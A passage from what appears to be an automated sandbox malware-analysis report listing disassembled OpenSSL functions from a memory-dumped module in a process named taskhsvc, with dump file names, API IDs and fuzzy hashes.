                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_new__stack_chk_fail
                                                            • String ID: :$r$s
                                                            • API String ID: 4283806828-1836192333
                                                            • Opcode ID: f9ddee6d3788e61ea8cb385e80fdf814cb333d024ce622f617c002d0f4b5b86d
                                                            • Instruction ID: 932f34c2bd339077839884b362693339b919ea4f8e8e13974dee22fc75f0d558
                                                            • Opcode Fuzzy Hash: f9ddee6d3788e61ea8cb385e80fdf814cb333d024ce622f617c002d0f4b5b86d
                                                            • Instruction Fuzzy Hash: 1CF01D316156009FDB20DF65CA4054BB7F1AB89318F56991DE6749B700D330F9058BD7
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE72FA0 Relevance: 9.3, APIs: 6, Instructions: 323COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N_set_wordisxdigit
                                                            • String ID:
                                                            • API String ID: 63692809-0
                                                            • Opcode ID: 039d135d2c010d95b13725498bb835a97839946427f8cee97c538d009d4866a4
                                                            • Instruction ID: a0c3f74f18ee966301af11196b885257e61f93c1a5561082259fe397229c2b53
                                                            • Opcode Fuzzy Hash: 039d135d2c010d95b13725498bb835a97839946427f8cee97c538d009d4866a4
                                                            • Instruction Fuzzy Hash: FDC1D4309187458BC768CE68C4A46AEB7F6FF9630CF71452CD45697E44E730E90ACBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF10570 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_failsk_freesk_numsk_value
                                                            • String ID:
                                                            • API String ID: 2969170662-0
                                                            • Opcode ID: ae3c90f02bff33442363332227eb4ce7d283104805d722200c0f481f79c9ba60
                                                            • Instruction ID: 097df72206ba3598e4882e2cb63c2adb80988fb3702b025dc6f3ca9a40b430a0
                                                            • Opcode Fuzzy Hash: ae3c90f02bff33442363332227eb4ce7d283104805d722200c0f481f79c9ba60
                                                            • Instruction Fuzzy Hash: D941683520D2818FDB04CF25C18064BBBF1BF8A318F118A1CEAA48BB50C771E855CF82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF0C470 Relevance: 9.1, APIs: 6, Instructions: 87COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_write$O_indentO_printfO_vprintf__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 3352650482-0
                                                            • Opcode ID: d025b2f9481e81ba02fc92c04db782b5c163387ffc0410106c7c0117aeba0ee1
                                                            • Instruction ID: 15e2cb72071f9c6bc61a9a6dae711f8e165690ca874c71176f2105f785bf7ea5
                                                            • Opcode Fuzzy Hash: d025b2f9481e81ba02fc92c04db782b5c163387ffc0410106c7c0117aeba0ee1
                                                            • Instruction Fuzzy Hash: A8313A763097028FC300EF29C95166BBBE0EB88748F11882DE999C7710D734E449DB93
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CEEC8E0 Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: E_finishY_asn1_find
                                                            • String ID:
                                                            • API String ID: 1002133939-0
                                                            • Opcode ID: 06629244ea800f3151208663289101129701a5e519f76fed224e798e5818a260
                                                            • Instruction ID: 68cdfbd83944fd66a44bbf2f8f7e8e9de9ca091b3275774e2fcc40227fecd302
                                                            • Opcode Fuzzy Hash: 06629244ea800f3151208663289101129701a5e519f76fed224e798e5818a260
                                                            • Instruction Fuzzy Hash: 893134B06083008FEB00EF25C18075ABBF0BF48798F25992CD8A99B749E736D544CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF2C8A0 Relevance: 9.1, APIs: 6, Instructions: 73COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PEM_read_PrivateKey.LIBEAY32 ref: 6CF2C8D4
                                                              • Part of subcall function 6CF2F630: BIO_s_file.LIBEAY32 ref: 6CF2F656
                                                              • Part of subcall function 6CF2F630: BIO_new.LIBEAY32 ref: 6CF2F65E
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: M_read_O_newO_s_filePrivate
                                                            • String ID:
                                                            • API String ID: 2318807758-0
                                                            • Opcode ID: db4626ba12c560ecad52fba967b89a8b40b49cc3ed06d1fd23bc6910c7c51c9b
                                                            • Instruction ID: b7fbcd0fefd1877545a1b00ac714d56a04cb895dc7fd85b8d5145dc475178780
                                                            • Opcode Fuzzy Hash: db4626ba12c560ecad52fba967b89a8b40b49cc3ed06d1fd23bc6910c7c51c9b
                                                            • Instruction Fuzzy Hash: 0D31D5756097019FD780EFA9C58061BBBF0BB89354F51992DF9A8C7710E334E9488F82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF426D0 Relevance: 9.1, APIs: 6, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • X509_CRL_it.LIBEAY32 ref: 6CF426E8
                                                            • OCSP_REQ_CTX_nbio_d2i.LIBEAY32 ref: 6CF426F8
                                                              • Part of subcall function 6CF730F0: OCSP_REQ_CTX_nbio.LIBEAY32(?,?,?,?,?,?,?,?,?,?,6CF426FD), ref: 6CF73111
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: L_itX509_X_nbioX_nbio_d2i
                                                            • String ID:
                                                            • API String ID: 3159624755-0
                                                            • Opcode ID: 77d878f641aef85256cc1a1a99b6b48d7100ab04756ccfd28a1f93082654a8c1
                                                            • Instruction ID: 38d5302349252892dfce0e771be535e763efa8daca1c9de024cd7f21fb58ff70
                                                            • Opcode Fuzzy Hash: 77d878f641aef85256cc1a1a99b6b48d7100ab04756ccfd28a1f93082654a8c1
                                                            • Instruction Fuzzy Hash: 8D2136B59087019FCB00DF25D58494BBBF4FF89358F06892EE59897310D331A949CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF6A890 Relevance: 9.1, APIs: 6, Instructions: 58COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
